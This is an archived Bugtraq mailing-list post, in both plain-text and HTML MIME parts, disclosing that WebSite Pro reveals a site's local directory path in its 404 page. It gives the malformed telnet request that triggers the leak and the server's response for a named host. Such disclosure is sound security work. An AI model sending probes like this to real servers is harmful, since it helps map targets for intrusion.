This is a multi-part message in MIME format. ------=_NextPart_000_005B_01BF5D34.2C3C5FE0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dear Bugtraqers, Description: WebSite Pro is also revealing the webdirectory of each Website by a = simple command line. This bug is similar to the "IIS revealing webdirectories" bug reported = on bugtraq. On WebSitePro the diference ist the way you retrieve the path. Example: (Made with MS Windows Telnet Client) Logfile: -----------------------------------------------------------------------st= art------------------------------------------------------------------- GET /HTTP1.0\ <------ Our command we send via Telnet on port 80 to = the webserver Response: Content-length: 186 =20 <HTML><HEAD><TITLE>Document Moved</TITLE></HEAD> <BODY = bgcolor=3D"White"><H2>Docume nt Moved</H2> This document has moved <A = HREF=3D"http://www.akte.net/HTTP1.0/">here </A>.<P> </BODY></HTML> GET /HTTP1.0/ Content-length: 230 =20 <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY = bgcolor=3D"White"><H2>404 Not Found</H2> The requested URL was not found on this = server:<P><CODE>/HTTP1.0/<P>( D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P> </BODY></HTML> -------------------------------------------------------------------end---= ---------------------------------------------------------------- Here it shows us, that the HTML files are in = D:\WEBROOTS\VHOSTS\aktenet\htdocs. It's not a large threat but an attacker might gain information about = the server which should stay in Admin's hands. On all Webservers e.g. MS IIS and Apache the response = is "error 404". -------cut------ Elias: I have some html in this mail, try to send it as clear text, as = it is, please. Else people with html capable browsers will only get half of the = logfile. Thx :-) ------cut------ ------------------------------- Lark Lizerman lizermanat_private ------------------------------- ------=_NextPart_000_005B_01BF5D34.2C3C5FE0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META content=3D"text/html; charset=3Diso-8859-1" = http-equiv=3DContent-Type> <META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#fffff0> <DIV><FONT face=3DArial size=3D2>Dear Bugtraqers,</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Description:</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>WebSite Pro is also revealing the = webdirectory of=20 each Website by a simple command line.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>This bug is similar to the "IIS = revealing=20 webdirectories" bug reported on bugtraq.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>On WebSitePro the diference ist the way = you=20 retrieve the path.</FONT></DIV> <DIV> </DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Example:</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>(Made with MS Windows Telnet = Client)</FONT></DIV> <DIV> </DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>Logfile:</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial=20 size=3D2>----------------------------------------------------------------= -------start-------------------------------------------------------------= ------</FONT></DIV> <DIV><FONT face=3DArial size=3D2>GET /HTTP1.0\ = <------ Our=20 command we send via Telnet on port 80 to the webserver<BR></FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Response:</FONT></DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Content-length:=20 186<BR> <BR><HTML><HEAD><TITLE>Document=20 Moved</TITLE></HEAD><BR> &= nbsp; &n= bsp; &nb= sp; &nbs= p; =20 <BODY bgcolor=3D"White"><H2>Docume<BR>nt=20 Moved</H2><BR>  = ; =20 This document has moved <A=20 HREF=3D"http://www.akte.net/HTTP1.0/">here<BR></A>.<P><BR>= =20 </BODY></HTML><BR>GET /HTTP1.0/<BR>Content-length:=20 230<BR> <BR><HTML><HEAD><TITLE>404 Not=20 Found</TITLE></HEAD><BR> &= nbsp; &n= bsp; &nb= sp; &nbs= p; =20 <BODY bgcolor=3D"White"><H2>404=20 Not<BR> Found</H2><BR> &nbs= p; =20 The requested URL was not found on this=20 server:<P><CODE>/HTTP1.0/<P>(<BR>D:\WEBROOTS\VHOSTS\akt= enet\htdocs\HTTP1.0)</CODE><P><BR> &nb= sp; &nbs= p;  = ; = =20 </BODY></HTML></FONT></DIV> <DIV> </DIV> <DIV> </DIV> <DIV><FONT face=3DArial=20 size=3D2>----------------------------------------------------------------= ---end-------------------------------------------------------------------= </FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2></FONT> </DIV> <DIV><FONT face=3DArial size=3D2>Here it shows us, that the HTML files = are in=20 D:\WEBROOTS\VHOSTS\aktenet\htdocs.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>It's not a large threat but an attacker = might =20 gain information about the server which should stay</FONT></DIV> <DIV><FONT face=3DArial size=3D2>in Admin's hands. = On all Webservers e.g.=20 MS IIS and Apache the response is "error 404".</FONT></DIV> <DIV> </DIV> <DIV><FONT face=3DArial size=3D2>-------cut------</FONT></DIV> <DIV><FONT face=3DArial size=3D2>Elias: I have some html in this mail, = try to send=20 it as clear text, as it is, please.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>Else people with html capable browsers = will only=20 get half of the logfile.</FONT></DIV> <DIV><FONT face=3DArial size=3D2>Thx :-)</FONT></DIV> <DIV><FONT face=3DArial size=3D2>------cut------</FONT></DIV> <DIV><FONT face=3DArial size=3D2>-------------------------------<BR>Lark = Lizerman<BR><BR><A=20 href=3D"mailto:lizermanat_private">lizermanat_private</A><BR>----------= ---------------------</FONT></DIV></BODY></HTML> ------=_NextPart_000_005B_01BF5D34.2C3C5FE0--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:27:54 PDT